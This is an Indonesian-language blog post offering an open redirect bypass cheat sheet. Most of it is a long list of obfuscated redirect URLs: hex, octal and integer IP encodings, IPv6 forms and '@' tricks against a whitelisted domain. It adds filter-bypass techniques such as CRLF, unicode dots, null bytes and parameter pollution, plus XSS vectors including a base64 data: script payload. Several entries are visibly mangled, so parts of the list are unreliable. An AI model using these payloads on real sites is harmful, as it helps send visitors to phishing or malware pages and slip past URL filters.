Open Redirect Bypass Cheat Sheet. Open redirect adalah celah yang memungkinkan attacker untuk mengarahkan pengunjung dari situs terpercaya ke situs malware atau phising tanpa autentifikasi dari admin situs. Bergantung pada arsitektur situs web yang rentan, pengalihan bisa terjadi setelah tindakan tertentu, seperti login, dan terkadang hal itu bisa terjadi seketika saat memuat sebuah halaman.
Open Redirect Bypass Cheat Sheet
http://3H6k7lIAiqjfNeN@[::ffff:] http://XY>.7d8T5pZM@[::ffff:] http://0xd8.072.54990 http://[email protected] http://[email protected] http://XY>[email protected] http://0xd8.3856078 http://[email protected] http://[email protected] http://XY>[email protected] http://00330.3856078 http://[email protected] http://[email protected] http://XY>[email protected] http://00330.0x3a.54990 http://[email protected] http://[email protected] http://XY>[email protected] http:0xd8.0x3a.0xd6.0xce http:[email protected] http:[email protected] http:XY>[email protected] http:0xd83ad6ce http:www.whitelisteddomain.tld@0xd83ad6ce http:3H6k7lIAiqjfNeN@0xd83ad6ce http:XY>.7d8T5pZM@0xd83ad6ce http:3627734734 http:www.whitelisteddomain.tld@3627734734 http:3H6k7lIAiqjfNeN@3627734734 http:XY>.7d8T5pZM@3627734734 http:472.314.470.462 http:[email protected] http:[email protected] http:XY>[email protected] http:0330.072.0326.0316 http:[email protected] http:[email protected] http:XY>[email protected] http:00330.00072.0000326.00000316 http:[email protected] http:[email protected] http:XY>[email protected] http:[::] http:www.whitelisteddomain.tld@[::] http:3H6k7lIAiqjfNeN@[::] http:XY>.7d8T5pZM@[::] http:[::ffff:] http:www.whitelisteddomain.tld@[::ffff:] http:3H6k7lIAiqjfNeN@[::ffff:] http:XY>.7d8T5pZM@[::ffff:] http:0xd8.072.54990 http:[email protected] http:[email protected] http:XY>[email protected] http:0xd8.3856078 http:[email protected] http:[email protected] http:XY>[email protected] http:00330.3856078 http:[email protected] http:[email protected] http:XY>[email protected] http:00330.0x3a.54990 http:[email protected] http:[email protected] http:XY>[email protected]
Using CRLF to bypass “javascript” blacklisted keyword
Using “//” to bypass “http” blacklisted keyword
Using “https:” to bypass “//” blacklisted keyword
Using “//” to bypass “//” blacklisted keyword (Browsers see // as //)
\/\/ /\/
Using “%E3%80%82” to bypass “.” blacklisted character
/?redir=googlećcom //google%E3%80%82com
Using null byte “%00” to bypass blacklist filter
Using parameter pollution
Using “@” character, browser will redirect to anything after the “@”
http://[email protected]/
Creating folder as their domain
XSS from Open URL – If it’s in a JS variable
XSS from data:// wrapper;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
XSS from javascript:// wrapper
Another Payload
Oke mungkin sekian sharing kali ini. Happy hacking.
Leave a Reply